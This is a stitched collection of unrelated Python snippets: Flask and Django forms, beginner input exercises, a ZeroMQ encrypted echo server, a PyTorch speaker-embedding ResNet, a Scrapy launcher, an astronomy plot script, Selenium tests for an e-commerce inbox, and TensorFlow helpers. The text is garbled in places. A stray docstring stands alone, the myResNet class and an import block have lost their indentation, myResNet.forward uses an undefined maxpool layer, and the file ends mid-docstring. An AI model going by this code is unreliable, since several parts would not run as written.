class UserBaseForm(FlaskForm):
    """Basic user-profile form: signature, nickname and gender."""
    # Personal signature
    signature = StringField(
        label="个性签名",
        validators=[  # validators
            # NOTE(review): this message says "username cannot be empty"
            # (用户名) although the field is the signature — likely copy-paste.
            validators.DataRequired(message="用户名不能为空"),
            validators.Length(max=20, min=3, message="个性签名长度必须小于%(max)d且大于%(min)d")
        ],
        description="个性签名",
        render_kw={
            "class": "input_txt",
            "required": "required",
            "placeholder": "请输入个性签名"
        }
    )
    # Nickname
    nick_name = StringField(
        label="昵称",
        validators=[
            validators.DataRequired('请输入昵称!'),
            validators.Length(max=10, min=1, message="昵称长度必须小于%(max)d且大于%(min)d")
        ],
        description="昵称",
        render_kw={
            "class": "input_txt",
            "required": "required",
            "placeholder": "请输入昵称"
        }
    )
    # Gender radio buttons; stored values are the English keys.
    gender = RadioField(
        label="性别",
        description="性别",
        validators=[
            DataRequired()
        ],
        coerce=str,
        choices=[
            ("MAN", '男'),  # Male
            ("WOMAN", '女')  # Female
        ],
        default="MAN",
        render_kw={
            "style": "display:inline-flex",
        }
    )
    submit = SubmitField(
        '确认',
        render_kw={
            "class": "btn btn-primary center-block"
        }
    )
"""修改密码"""
class ModifyPassowrd(FlaskForm):
    """Change-password form: current password, new password, confirmation.

    NOTE(review): class name has a typo ("Passowrd") but renaming would break
    importers -- fix only together with all call sites.
    """
    # Current password: required; length check intentionally disabled below.
    oldPassword = PasswordField(
        label="当前密码",
        validators=[  # validators
            validators.DataRequired(message="密码不能为空"),
            # validators.Length(max=20, min=3, message="密码长度必须小于%(max)d且大于%(min)d")
        ],
        render_kw={
            "class": "input_txt"
        }
    )
    # New password: required, length 8-16.
    newPassword = PasswordField(
        label="新密码",
        validators=[  # validators
            validators.DataRequired(message="密码不能为空"),
            validators.Length(max=16, min=8, message="密码长度必须小于%(max)d且大于%(min)d")
        ],
        render_kw={
            "class": "input_txt"
        }
    )
    # Confirmation: must equal newPassword.
    confirmPassword = PasswordField(
        label="重复密码",
        validators=[  # validators
            validators.DataRequired(message="密码不能为空"),
            validators.EqualTo('newPassword', message='两次密码不一致')
        ],
        render_kw={
            "class": "input_txt"
        }
    )
    submit = SubmitField(
        '提交',
        render_kw={
            "class": "btn btn-primary center-block"
        }
    )
class UserImg(FlaskForm):
    """Avatar-upload form: a single required image file plus submit button."""
    # Avatar file upload: required.
    url = FileField(
        label="上传头像: ",
        validators=[
            DataRequired("请上传图片")
        ],
        description="头像"
    )
    submit = SubmitField(
        '提交',
        render_kw={
            "class": "btn btn-primary center-block"
        }
    )
|
"""ZKSync API."""
|
__author__ = 'hamid'
from .models import MyUser
from django.contrib.auth.forms import UserCreationForm
class SignUpForm(UserCreationForm):
    """Registration form for MyUser showing placeholders instead of help text.

    Bug fix: the original called ``super(UserCreationForm, self).__init__``,
    which resolves to the class *above* UserCreationForm in the MRO and
    therefore skips ``UserCreationForm.__init__`` itself; use plain
    ``super()`` so the whole chain runs.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Drop Django's default help text on these fields.
        for fieldname in ('username', 'password1', 'password2'):
            self.fields[fieldname].help_text = None
        # Placeholders act as the visible labels in the template.
        placeholders = {
            'username': 'User Name',
            'first_name': 'First Name',
            'last_name': 'Last Name',
            'password1': 'Password',
            'password2': 'Re-Password',
        }
        for fieldname, text in placeholders.items():
            self.fields[fieldname].widget.attrs['placeholder'] = text

    class Meta:
        model = MyUser
        fields = ('username', 'first_name', 'last_name',
                  'password1', 'password2',)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Exercise script (created Mon Apr 6 03:07:16 2020): six small
input/branching tasks, rewritten with lookup tables and guard clauses.
All prompts and printed output are identical to the original."""

# Question 1: read an integer 1-5 and print its English name; anything else
# (in range terms) prints the rejection message.  Non-numeric input still
# raises ValueError from int(), as before.
number_words = {1: "one", 2: "two", 3: "three", 4: "four", 5: "five"}
choice = int(input("Please enter a number between 1 and 5\n>>>"))
print(number_words.get(choice, "Out of range!!!"))

# Question 2: the reverse mapping -- read the English word (case-insensitive)
# and print the digit.
word_values = {"one": 1, "two": 2, "three": 3, "four": 4, "five": 5}
word = input("Please typein a number between one and five\n>>>").lower()
print(word_values.get(word, "Out of range!!!"))

# Question 3: guessing game against a fixed secret number.
secret = 5
answer = input("I have a number in mind between 1 and 10, Can you guess it ?\n>>>")
if not answer.isdigit():
    print("Thats not even an integer")
else:
    guess = int(answer)
    if guess == secret:
        print("Yes!!!!, You guessed the number correctly as ", secret)
    elif 0 < guess < secret:
        print("Wrong!!!!! The number you guessed is lesser than number.")
    elif secret < guess < 11:
        print("Wrong!!!!! The number you guessed is bigger than number.")
    else:
        print("Number out of bounds")

# Question 4: reveal the name length only when it is 5 characters or fewer.
user_name = input("Hey, whats your name ?\n>>>")
if len(user_name) <= 5:
    print("Your name has ", len(user_name), "chars")
else:
    print("Length of your name is a secret.")

# Question 5: product if both > 15, sum if exactly one is, otherwise 0.
print("Please entre two numbers between 1 and 20\n")
first = int(input("Number 1 : "))
second = int(input("Number 2 : "))
if first > 15 and second > 15:
    print("The product of the two numbers is ", first * second)
elif first > 15 or second > 15:
    print("The sum of the two numbers is ", first + second)
else:
    print(0)

# Question 6: swap two values (tuple unpacking instead of a temp variable).
print("Please entre two numbers\n")
val1 = int(input("Number 1 : "))
val2 = int(input("Number 2 : "))
print("Entered numbers are val1=", val1, " and val2=", val2, end="\n")
val1, val2 = val2, val1
print("Post swap val1=", val1, " val2=", val2)
#!/usr/bin/python
# Python 2 script: ZeroMQ REP server that AES-decrypts each request
# (keyczar), parses it as a JSON envelope and sends the same payload back
# re-encrypted.
import zmq
import json
from keyczar.keys import AesKey
context = zmq.Context()
socket = context.socket(zmq.REP)
# Listen on all interfaces, port 5099.
socket.bind("tcp://*:5099")
# Shared symmetric key read from disk.
# NOTE(review): the file handle is never closed and `file` shadows the py2
# builtin -- harmless here but worth cleaning up.
file = open('shared_secret.junk')
key = AesKey.Read(file.read())
while True:
    # Blocking receive -> decrypt -> parse JSON envelope.
    data = socket.recv()
    data = key.Decrypt(data)
    data = json.loads(data)
    # Envelope fields (operation/param1/param2 are extracted but unused --
    # presumably a stub for a real RPC dispatch; confirm intent).
    operation = data['operation']
    param1 = data['param1']
    param2 = data['param2']
    print "Got", data
    # Echo the parsed request back, re-encrypted.
    data2 = json.dumps(data)
    data2 = key.Encrypt(data2)
    socket.send(data2)
|
"""Prompt for a name and print a one-line greeting."""
name = input("What is your name? ")
greeting = "".join(["Hello, ", name, ". How are you today?"])
print(greeting)
|
import torch
import math
import numpy as np
try:
from . import constants as c
except ValueError:
import constants as c
import torch.nn as nn
from torch.autograd import Function
from torch.nn.functional import pairwise_distance, cosine_similarity
PairwiseDistance = nn.PairwiseDistance
CosineSimilarity = nn.CosineSimilarity
def distance(input1, input2, metric):
    """Compute a batched similarity/distance between two tensors.

    metric must be "CosineSimilarity" or "PairwiseDistance"; any other value
    raises RuntimeError, exactly as before.
    """
    dispatch = {
        "CosineSimilarity": cosine_similarity,
        "PairwiseDistance": pairwise_distance,
    }
    fn = dispatch.get(metric)
    if fn is None:
        raise RuntimeError('Distance/Difference Metric Unknown')
    return fn(input1, input2)
class TripletMarginLoss(Function):
    """Triplet loss: mean(clamp(margin + d(a,p) - d(a,n), min=0)).

    NOTE(review): ``self.pdist`` is CosineSimilarity (larger = more similar),
    yet the hinge ``margin + d_p - d_n`` treats d as a distance (smaller =
    closer); with similarity the signs look inverted.  The commented-out
    PairwiseDistance line suggests the formula was written for distances --
    confirm which metric is intended before relying on this loss.
    """
    def __init__(self, margin):
        super(TripletMarginLoss, self).__init__()
        self.margin = margin  # hinge margin
        # self.pdist = PairwiseDistance(p = 2)
        self.pdist = CosineSimilarity()
    def forward(self, anchor, positive, negative):
        """Return the mean hinge over the batch of (anchor, pos, neg) rows."""
        d_p = self.pdist.forward(anchor, positive)  # anchor-positive score
        d_n = self.pdist.forward(anchor, negative)  # anchor-negative score
        dist_hinge = torch.clamp(self.margin + d_p - d_n, min=0.0)
        # loss = torch.sum(dist_hinge)
        loss = torch.mean(dist_hinge)
        return loss
class ReLU(nn.Hardtanh):
    """Clipped ReLU: clamps activations into [0, 20] ("ReLU20")."""

    def __init__(self, inplace=False):
        # Hardtanh(0, 20) == min(max(x, 0), 20)
        super(ReLU, self).__init__(0, 20, inplace)

    def __repr__(self):
        suffix = 'inplace' if self.inplace else ''
        return '{} ({})'.format(self.__class__.__name__, suffix)
def conv3x3(in_planes, out_planes, stride=1):
    """3x3 convolution, padding 1, no bias (ResNet-style)."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
class BasicBlock(nn.Module):
    """Two-conv residual block with an optional downsampled skip path."""
    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BasicBlock, self).__init__()
        # Submodule creation order matches the original (state_dict keys and
        # RNG consumption depend on it).
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes)
        self.relu = ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        # Skip path: identity, or the configured downsample projection.
        skip = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        return self.relu(out + skip)
class myResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000):
super(myResNet, self).__init__()
self.relu = ReLU(inplace=True)
self.inplanes = 64
self.conv1 = nn.Conv2d(1, 64, kernel_size=5, stride=2, padding=2,bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.layer1 = self._make_layer(block, 64, layers[0])
self.inplanes = 128
self.conv2 = nn.Conv2d(64, 128, kernel_size=5, stride=2, padding=2,bias=False)
self.bn2 = nn.BatchNorm2d(128)
self.layer2 = self._make_layer(block, 128, layers[1])
self.inplanes = 256
self.conv3 = nn.Conv2d(128, 256, kernel_size=5, stride=2, padding=2,bias=False)
self.bn3 = nn.BatchNorm2d(256)
self.layer3 = self._make_layer(block, 256, layers[2])
self.inplanes = 512
self.conv4 = nn.Conv2d(256, 512, kernel_size=5, stride=2, padding=2,bias=False)
self.bn4 = nn.BatchNorm2d(512)
self.layer4 = self._make_layer(block, 512, layers[3])
self.avgpool = nn.AdaptiveAvgPool2d((1, None))
self.fc = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
layers = []
layers.append(block(self.inplanes, planes, stride))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class DeepSpeakerModel(nn.Module):
    """Speaker-embedding network: myResNet trunk driven stage by stage,
    producing an L2-normalised embedding scaled by alpha=10, plus an
    optional classification head for training."""
    def __init__(self, embedding_size, num_classes, feature_dim = 64, frame_dim = 32):
        # NOTE(review): frame_dim is never used in this class -- confirm it
        # can be dropped (kept here for interface compatibility).
        super(DeepSpeakerModel, self).__init__()
        self.embedding_size = embedding_size
        self.model = myResNet(BasicBlock, [3, 3, 3, 3])
        # The four stride-2 convs shrink the feature axis by 16x; the width
        # surviving the (1, None) avg-pool sizes the replacement fc layer.
        num = int(math.ceil(feature_dim/16.0))
        self.model.fc = nn.Linear(512 * num, self.embedding_size)
        self.model.classifier = nn.Linear(self.embedding_size, num_classes)
    def l2_norm(self, input):
        """Row-wise L2 normalisation; the 1e-10 epsilon guards zero rows."""
        input_size = input.size()
        buffer = torch.pow(input, 2)
        normp = torch.sum(buffer, 1).add_(1e-10)
        norm = torch.sqrt(normp)
        _output = torch.div(input, norm.view(-1, 1).expand_as(input))
        output = _output.view(input_size)
        return output
    def forward(self, x):
        """Run the trunk manually (bypassing myResNet.forward) and return
        the scaled, L2-normalised embedding."""
        x = self.model.conv1(x)
        x = self.model.bn1(x)
        x = self.model.relu(x)
        x = self.model.layer1(x)
        x = self.model.conv2(x)
        x = self.model.bn2(x)
        x = self.model.relu(x)
        x = self.model.layer2(x)
        x = self.model.conv3(x)
        x = self.model.bn3(x)
        x = self.model.relu(x)
        x = self.model.layer3(x)
        x = self.model.conv4(x)
        x = self.model.bn4(x)
        x = self.model.relu(x)
        x = self.model.layer4(x)
        x = self.model.avgpool(x)
        x = x.view(x.size(0), -1)
        x = self.model.fc(x)
        self.features = self.l2_norm(x)
        # Multiply by alpha = 10 as suggested in https://arxiv.org/pdf/1703.09507.pdf
        alpha=10
        self.features = self.features*alpha
        return self.features
    def forward_classifier(self, x):
        """Embed `x` and apply the classification head."""
        features = self.forward(x)
        res = self.model.classifier(features)
        return res
|
import scrapy.cmdline
def main():
    """Launch the `mysina` spider through Scrapy's CLI entry point."""
    # An output feed could be requested with -o in one of: json, jsonlines,
    # jl, csv, xml, marshal, pickle.
    scrapy.cmdline.execute(['scrapy', 'crawl', 'mysina'])


if __name__ == '__main__':
    main()
import os
import math
import scipy
import numpy as np
from astropy.io import ascii
from astropy.io import fits
import matplotlib.pyplot as plt
import matplotlib as mpl
########################################
#~ print "#Give the ObIds in a text-file"
#~ font = {
#~ 'weight' : 'bold',
#~ 'size' : 15}
#~ mpl.rc('font', **font)
#~ mpl.rcParams['axes.linewidth'] = 1.5
#~ mpl.rcParams['axes.labelweight']='bold'
#~ mpl.rcParams['axes.labelsize']='large'
#~ mpl.rcParams['xtick.major.size'] = 4
#~ mpl.rcParams['xtick.major.width'] = 2
#~ mpl.rcParams['ytick.major.size'] = 4
#~ mpl.rcParams['ytick.major.width'] = 2
# Swift/BAT light-curve plot: read the qdp light curve, draw it as a grey
# step plot and mark time intervals of interest with dotted vertical lines.
BAT_LC_data = ascii.read("BAT_LC.qdp", header_start = None, data_start=3)
time_cen = np.array(BAT_LC_data['col1'])    # bin centres (s since trigger)
#~ start_times =np.array(BAT_LC_data['col2'])
#~ stop_times =np.array(BAT_LC_data['col3'])
rate_bins =np.array(BAT_LC_data['col2'])    # count rate per bin
rate_errors =np.array(BAT_LC_data['col3'])  # 1-sigma errors (currently unused)
plt.plot(time_cen, rate_bins, '.', color='grey',linestyle='steps-post',markersize=0, markerfacecolor='none', markeredgecolor='grey',lw = 1.0)
# ~ BAT_snr30_bins = ascii.read("BAT_LC_times_snr30.qdp", header_start = None, data_start=0, comment = '#')
# ~ t_mid = BAT_snr30_bins['col1']
# ~ t_s = BAT_snr30_bins['col2']
# ~ t_stop = BAT_snr30_bins['col3']
# ~ rate_bat = BAT_snr30_bins['col4']
# ~ rate_bat_err = BAT_snr30_bins['col5']
#~ last = t_stop
# ~ plt.plot(t_s, rate_bat, '.', color='k',linestyle='steps-post',markersize=0, markerfacecolor='none', markeredgecolor='grey',lw = 1.5)
#~ plt.plot(t_s, rate_bat, yerr=rate_bat_err, fmt='.', color='k',lw = 1.3, markersize=0, linestyle='steps-post', markerfacecolor='none', markeredgecolor='k')
# Interval boundaries (hand-picked trigger-relative times).
plt.axvline(x=-52.1144, ymin=-10, ymax=10000,ls='dotted')
plt.axvline(x=-43.4104, ymin=-10, ymax=10000,ls='dotted')
plt.axvline(x=-4.4344, ymin=-10, ymax=10000,ls='dotted')
plt.axvline(x=10.9896, ymin=-10, ymax=10000,ls='dotted')
# BUG FIX: the next line referenced t_stop[-2], but t_stop is only assigned
# in the commented-out "BAT_LC_times_snr30.qdp" section above, so it raised
# NameError.  Disabled until that section is restored.
# plt.axvline(x=t_stop[-2], ymin=-10, ymax=10000,ls='dotted')
plt.ylabel(r'Counts $\/$ s$^{-1}$ det$^{-1}$',fontsize= 14 )
#~ plt.legend(numpoints=1,prop={'size':11})
plt.xlabel(r'Time since BAT trigger$\/$(s)',fontsize=14)
plt.show()
|
def plot_gallery(title, images, n_col, n_row):
    """Show the first n_col*n_row rows of `images` as a titled grid of
    grayscale tiles.

    NOTE(review): relies on module-level globals `plt` and `image_shape`
    defined elsewhere in the file -- confirm `image_shape` matches the
    flattened length of each row of `images`.
    """
    n = n_col*n_row
    plt.figure(figsize=(2. * n_col, 2.26 * n_row))
    plt.suptitle(title, size=16)
    for i, comp in enumerate(images[:n]):
        plt.subplot(n_row, n_col, i + 1)
        # Symmetric colour range so positive/negative components are
        # rendered comparably around zero.
        vmax = max(comp.max(), -comp.min())
        plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,
                   interpolation='nearest',
                   vmin=-vmax, vmax=vmax)
        # Hide axis ticks -- these are images, not charts.
        plt.xticks(())
        plt.yticks(())
    plt.subplots_adjust(0.01, 0.05, 0.99, 0.93, 0.04, 0.)
    plt.show()
|
from setuptools import setup

# Packaging metadata for the Schema JSON Extractor CLI (`sje`).
setup(
    name='sje',
    version='1.0.0',
    description='Schema JSON Extractor.',
    author='Ryan Yuan',
    author_email='ryan.yuan@outlook.com',
    packages=['sje'],
    install_requires=[
        'pytest==5.0.0',
        'PyYAML==5.1.1',
        'sqlparse==0.3.0',
    ],
    entry_points={
        'console_scripts': [
            'sje = sje.__main__:main',
        ],
    },
)
import math
from matrix import Matrix
class GrayscaleMatrix(Matrix):
    """A width x height grayscale raster.

    Values are stored column-major (``values[x][y]``) either as ints in
    0..255 (``value_type=int``) or as floats in 0..1.
    """

    def __init__(self, width, height, value_type=int):
        super().__init__(width, height)
        zero = 0 if value_type is int else 0.0
        self.values = [[zero] * height for _ in range(width)]
        self.value_type = value_type

    def apply_to(self, image):
        """Grey out `image` in place by writing this matrix into R, G and B."""
        for x, y in image.coordinates:
            if self.value_type is int:
                level = self.values[x][y]
            else:
                level = int(self.values[x][y] * 255)
            image.reds[x][y] = image.greens[x][y] = image.blues[x][y] = level

    def luminance(self, x, y):
        """Return the luminance at (x, y) in [0, 1], whatever the storage type."""
        value = self.values[x][y]
        return value / 255 if self.value_type is int else value

    def set_luminance(self, x, y, value):
        """Store a [0, 1] luminance, converting to the storage type."""
        self.values[x][y] = int(value * 255) if self.value_type is int else value

    @staticmethod
    def from_image(image, value_type=int):
        """Build a matrix from an RGB image via the weighted gray conversion."""
        matrix = GrayscaleMatrix(image.width, image.height, value_type)
        for x, y in image.coordinates:
            gray = gray_from_rgb(image.reds[x][y],
                                 image.greens[x][y],
                                 image.blues[x][y])
            matrix.values[x][y] = gray if value_type is int else gray / 255
        return matrix

    def __getitem__(self, x):
        return self.values[x]
def gray_from_rgb(red, green, blue):
    """Convert an RGB triple to a gray level using the 0.299/0.587/0.114
    (BT.601 luma) weights, floored to an int."""
    luma = 0.299 * red + 0.587 * green + 0.114 * blue
    return math.floor(luma)
if __name__ == '__main__':
    # CLI demo: convert one colour (argv[1], parsed by RgbColor.from_string)
    # to its gray equivalent.
    # NOTE(review): `color(RgbColor(...))` *calls* the RgbColor instance --
    # presumably RgbColor defines __call__ for formatting; confirm against
    # color.rgb before changing.
    import sys
    from color.rgb import RgbColor
    color = RgbColor.from_string(sys.argv[1])
    gray = gray_from_rgb(color.red, color.green, color.blue)
    print(color(RgbColor(gray, gray, gray)))
|
import os,sys, time, re
from main.page.base import BasePage
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from main.page.desktop_v3.inbox_message.pe_inbox_message import *
from main.page.desktop_v3.inbox_message.pe_message_details import *
from random import randint
from utils.etc import *
from utils.function.censorlink import *
class inboxMessageActivity():
    """Selenium flows over Tokopedia's inbox-message pages: navigation,
    collecting message element IDs (with pagination), read/reply checks and
    link-censoring verification.  Code is unchanged; comments below are
    review notes."""
    def goto_inbox_message(self, driver, site):
        """Open the inbox-message page (tab/filter exercises are disabled)."""
        inbox_message = InboxMessagePage(driver)
        inbox_message.open(site)
        print('masuk inbox-message.pl')
        #inbox_message_page.check_message_exists()
        """inbox_message.select_filter_unread()
        print('masuk filter unread')
        time.sleep(5)
        inbox_message.select_tab_inbox()
        print('masuk tab inbox')
        inbox_message.select_tab_archive()
        print('masuk tab archive')
        inbox_message.select_tab_sent()
        print('masuk tab sent')
        inbox_message.select_tab_trash()
        print('masuk tab trash')"""
    def get_list_sent_message(self, driver, site):
        """Collect the element IDs of all messages in the Sent tab, paging
        with the next button.  Returns (ids, count); on a missing element it
        returns whatever was collected so far."""
        list_sent_msg_ID = []
        next_list_sent_msg_ID = []  # NOTE(review): unused
        try:
            inbox_message = InboxMessagePage(driver)
            inbox_message.open(site)
            inbox_message.select_tab_sent()
            time.sleep(2)
            #get list of sent message ID in first page
            list_sent_msg = inbox_message.get_list_message()
            for i in list_sent_msg:
                list_sent_msg_ID.append(i.get_attribute('id'))
            #check is next page available
            is_next_page_exists = inbox_message.next_button_element()
            while is_next_page_exists == 1: #if next page available
                inbox_message.click_next_button()
                time.sleep(3)
                next_list_sent_message = inbox_message.get_list_message()
                for i in next_list_sent_message:
                    list_sent_msg_ID.append(i.get_attribute('id'))
                is_next_page_exists = inbox_message.next_button_element()
            #endwhile
            print('End of inbox page')
            print('List of sent message ID has been successfully populated ...')
            total = len(list_sent_msg_ID)
            print('Total Sent Messages : ' + str(total))
            return(list_sent_msg_ID, total)
        except NoSuchElementException:
            total = len(list_sent_msg_ID)
            print('Total Sent Message : ' + str(total))
            return(list_sent_msg_ID, total)
    def get_list_unread_message(self, driver, site):
        """Same as get_list_sent_message but for the unread filter.

        NOTE(review): the lists are initialised *inside* the try block, so if
        open()/select_tab_inbox() raises NoSuchElementException first, the
        except path reads an unbound list_unread_msg_ID (NameError).  The
        initialisation should be hoisted above the try, as the sent-message
        variant does."""
        try:
            inbox_message = InboxMessagePage(driver)
            inbox_message.open(site)
            list_unread_msg_ID = []
            next_list_unread_msg_ID = []
            inbox_message.select_tab_inbox()
            inbox_message.select_filter_unread()
            list_unread_msg = inbox_message.get_list_message()
            for i in list_unread_msg:
                list_unread_msg_ID.append(i.get_attribute('id'))
            #check next page in first page
            next = inbox_message.next_button_element()
            while next == 1:
                inbox_message.click_next_button()
                time.sleep(5)
                next = inbox_message.next_button_element()
                next_list_unread_message = inbox_message.get_list_message()
                for i in next_list_unread_message:
                    list_unread_msg_ID.append(i.get_attribute('id'))
            #endwhile
            print('End of inbox page')
            print('List of unread message ID has been successfully populated ...')
            total = len(list_unread_msg_ID)
            print('Total Unread Message : ' + str(total))
            return(list_unread_msg_ID, total)
        except NoSuchElementException:
            total = len(list_unread_msg_ID)
            print('Total Unread Message : ' + str(total))
            return(list_unread_msg_ID, total)
    def is_message_received(self, driver, site, msg_ID):
        """Check how many of the IDs in msg_ID appear in the unread list and
        report the outcome to stdout (no return value)."""
        inbox_message = InboxMessagePage(driver)
        list_unread_msg_ID, total_list_unread = self.get_list_unread_message(driver, site)
        print(list_unread_msg_ID)
        msg_received = [] #create list of received message
        print('msg_ID : ')
        print(msg_ID)
        for i in msg_ID:
            #print(i)
            for j in list_unread_msg_ID:
                print('j: ')
                #print(j)
                if i==j:
                    msg_received.append(i)
                    break
                else:
                    pass
        print('msg_received :')
        for i in msg_received:
            print(i)
        total_msg_received = len(msg_received)
        total_msg_ID = len(msg_ID)
        print(str(total_msg_received) + ' out of ' + str(total_msg_ID) + ' message(s) received from previous test flow.')
        if total_msg_received == total_msg_ID and total_msg_received!=0:
            print('All message is successfully received')
        else:
            diff = total_msg_ID - total_msg_received #to count how many message that is not received
            print(str(diff) + ' message(s) is not received')
        #need improvement: Add check all message, archived, and trash
    def check_sent_message_status(self, driver, site):
        """Open the inbox and dump the Sent-tab message count (work in
        progress)."""
        inbox_message = InboxMessagePage(driver)
        inbox_message.open(site)
        print('----- Cek Inbox Sent Status -----')
        self.get_list_sent_message(driver, site)
        #print('Total Sent Message = ' + str(total))
        #ongoing
    def check_message_details(self, driver, site):
        """Open the first unread message of the last page and assert all
        detail-page elements exist; then verify it left the unread list.

        NOTE(review): `if i==unread_message:` below compares a string ID to
        the whole list returned by get_list_unread_message, so it is always
        False and `flag` can never be set -- the staleness check is a no-op.
        Confirm it should be `if i in unread_message:` / compare per-ID."""
        flag = 0
        inbox_message = InboxMessagePage(driver)
        message_details = PageMessageDetails(driver)
        inbox_message.open(site)
        inbox_message.select_filter_unread()
        unread_message, total_unread_message = self.get_list_unread_message(driver, site)
        #get index of messages in last page
        last_page_message_list = inbox_message.get_list_message()
        last_page_message_list_ID = []
        for i in last_page_message_list:
            last_page_message_list_ID.append(i.get_attribute('id'))
        total_last_page_message_list = len(last_page_message_list_ID)
        print(last_page_message_list_ID)
        inbox_message.click_message(last_page_message_list_ID, total_last_page_message_list)
        #check elements in message details
        time.sleep(5)
        try:
            message_details.locate_message_header()
            print('Header exists.')
            message_details.locate_current_shop()
            print('[Your Shop Name] exists.')
            message_details.locate_sender_name_header()
            message_details.locate_sender_name_small()
            print('Sender name exists.')
            message_details.locate_textarea()
            print('Textarea exists.')
            message_details.locate_reply_button()
            print('Reply button exists.')
            msg_content = message_details.get_message_content()
            print(msg_content)
            print('----')
            print('All component exists.')
        except Exception as inst:
            print(inst)
        message_details.click_back_button()
        unread_message_new, total_unread_message_new = self.get_list_unread_message(driver, site)
        for i in unread_message_new:
            if i==unread_message:
                flag = 1
                print('CAUTION! ' + str(unread_message) + 'STILL EXISTS IN UNREAD MSG LIST. IT SHOULD HAVE BEEN REMOVED.')
                break
            else:
                pass
        if flag!=1:
            print('Message has been successfully read')
    def test(self):
        """Scratch helper: loads the whitelist/blacklist files (results are
        discarded -- presumably a leftover; confirm before removing)."""
        #get whitelist and blacklist
        file_w = open("../../../utils/etc/file_io/whitelist.txt",'r')
        file_b = open("../../../utils/etc/file_io/blacklist.txt",'r')
        file_whitelist = file_w.read().splitlines()
        file_blacklist = file_b.read().splitlines()
        file_w.close()
        file_b.close()
    def is_message_contains_blacklisted_links(self, driver, site, sent_msg_ID, sent_message):
        """Open the message with ID sent_msg_ID and compare its received body
        against the sent text with the link-censoring checker."""
        inbox_message = InboxMessagePage(driver)
        message_details = PageMessageDetails(driver)
        sent_msg_ID = sent_msg_ID[0]
        print(sent_msg_ID)
        inbox_message.open(site)
        inbox_message.select_filter_unread()
        unread_message = inbox_message.get_list_message() #get unread message in first page
        print(unread_message)
        total_unread_message = len(unread_message)
        print('break1')
        inbox_message.click_message(unread_message, total_unread_message, sent_msg_ID) #click message with ID = sent_msg_ID
        print('break2')
        time.sleep(3)
        #get send message
        sent_message = str.split(sent_message)
        #get received message (strip the quoted preview prefix word-by-word)
        msg_content_small = str.split(message_details.get_message_content_small())
        msg_content_small_count = len(msg_content_small)
        received_message = str.split(message_details.get_message_content())
        received_message = received_message[msg_content_small_count:]
        #get whitelist and blacklist
        file_w = open('../../../utils/etc/file_io/whitelist.txt','r')
        file_b = open('../../../utils/etc/file_io/blacklist.txt','r')
        file_whitelist = file_w.read().splitlines()
        file_blacklist = file_b.read().splitlines()
        file_w.close()
        file_b.close()
        check_if_link_censored(sent_message, received_message, file_blacklist, file_whitelist) #censored link function
    def reply_message(self, driver, site, message_ID):
        """Open message message_ID[0], post a randomized reply and verify the
        reply count grew; returns ([new_reply_id], diff) on success."""
        message_ID = message_ID[0]
        inbox_message = InboxMessagePage(driver)
        message_details = PageMessageDetails(driver)
        reply_message = 'Tokopedia qc test reply message #' + str(randint(0,9999))
        inbox_message.select_filter_unread()
        message_list = inbox_message.get_list_message()
        message_list_ID = []
        for i in message_list:
            message_list_ID.append(i.get_attribute('id'))
        total_message_list = len(message_list_ID)
        inbox_message.click_message(message_list_ID, total_message_list, message_ID)
        time.sleep(6)
        # NOTE(review): bare except below swallows any error, not just the
        # "no replies yet" case -- narrow it if possible.
        try:
            reply_ID_list_before = message_details.get_reply_ID()
        except: #if there is no reply in message, list empty
            reply_ID_list_before = []
        total_reply_ID_list_before = len(reply_ID_list_before)
        print('Total reply before: ' + str(total_reply_ID_list_before))
        message_details.write_reply(reply_message)
        message_details.click_reply_button()
        print('reply sent')
        time.sleep(8)
        reply_ID_list_after = message_details.get_reply_ID()
        print(reply_ID_list_after)
        total_reply_ID_list_after = len(reply_ID_list_after)
        print('Total reply after: ' + str(total_reply_ID_list_after))
        diff = total_reply_ID_list_after - total_reply_ID_list_before
        print(str(diff) + ' reply is sent.')
        if diff > 0:
            print('Reply is shown.')
            new_reply_ID = reply_ID_list_after[total_reply_ID_list_after-1:total_reply_ID_list_after] #get the last reply in list
            return(new_reply_ID, diff) #new reply ID and the number of reply sent
        # NOTE(review): the branch below ends in `raise('...')`, which raises
        # a TypeError in Python 3 (exceptions must derive from BaseException);
        # it should be e.g. `raise RuntimeError('ERROR! Reply is not shown')`.
        elif diff == 0:
raise('ERROR! Reply is not shown') |
import tensorflow as tf
def inicializar_tensor_array(tensors, session):
    """Run the initializer op of every tensor in a two-level nested list."""
    for group in tensors:
        for tensor in group:
            session.run(tensor.initializer)
def pad_up_to(t, max_in_dims, constant_values):
    """Pad tensor `t` at the trailing edge of each axis so that its shape
    becomes `max_in_dims`, filling new cells with `constant_values`."""
    current = tf.shape(t)
    paddings = [[0, target - current[axis]]
                for axis, target in enumerate(max_in_dims)]
    return tf.pad(t, paddings, 'CONSTANT', constant_values=constant_values)
def variable_summaries(var):
    """Attach a lot of summaries to a Tensor (for TensorBoard visualization).

